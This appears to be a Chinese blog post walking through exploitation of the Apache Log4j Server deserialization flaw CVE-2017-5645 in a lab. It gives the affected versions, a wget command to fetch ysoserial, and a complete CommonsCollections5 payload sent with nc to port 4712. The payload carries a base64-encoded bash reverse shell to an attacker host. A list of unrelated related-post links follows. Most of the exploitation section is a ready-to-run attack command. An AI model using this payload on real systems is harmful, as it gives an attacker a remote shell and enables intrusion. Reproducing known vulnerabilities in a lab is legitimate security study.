Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

漏洞复现环境搭建请参考

http://t.csdnimg.cn/MxmId

漏洞版本

Apache Log4j 2.8.2之前的2.x版本

漏洞验证

(1)开放端口4712

漏洞利用

(1)ysoserial工具获取

python 复制代码
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

(2)base64加密反弹shell命令

(3)攻击机开启监听

(4)执行命令获取反弹shell

python 复制代码
#执行错误原因是因为Kali的jdk版本与ysoserial版本不符,正常执行完该条语句即可反弹shell
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|{bash,-i}" | nc 192.168.88.128 4712
相关推荐
磊灬泽1 小时前
【日常错误】鼠标无反应
linux·windows
Highcharts.js5 小时前
Highcharts 数据源安全最佳实践:保障数据安全,助力可视化可信部署
安全·highcharts
Miracle&5 小时前
2.TCP深度解析:握手、挥手、状态机、流量与拥塞控制
linux·网络·tcp/ip
专注API从业者6 小时前
Python/Java 代码示例:手把手教程调用 1688 API 获取商品详情实时数据
java·linux·数据库·python
Suckerbin6 小时前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
Ribou6 小时前
Ubuntu 24.04.2安装k8s 1.33.4 配置cilium
linux·ubuntu·kubernetes
水兵没月6 小时前
解决Win11 安全中心删掉存在隐患的工具
安全
不老刘7 小时前
行为式验证码技术解析:滑块拼图、语序选词与智能无感知
网络安全·验证码·行为式验证码
tan180°7 小时前
Boost搜索引擎 网络库与前端(4)
linux·网络·c++·搜索引擎
码农101号7 小时前
运维安全04 - iptable的介绍以及使用
安全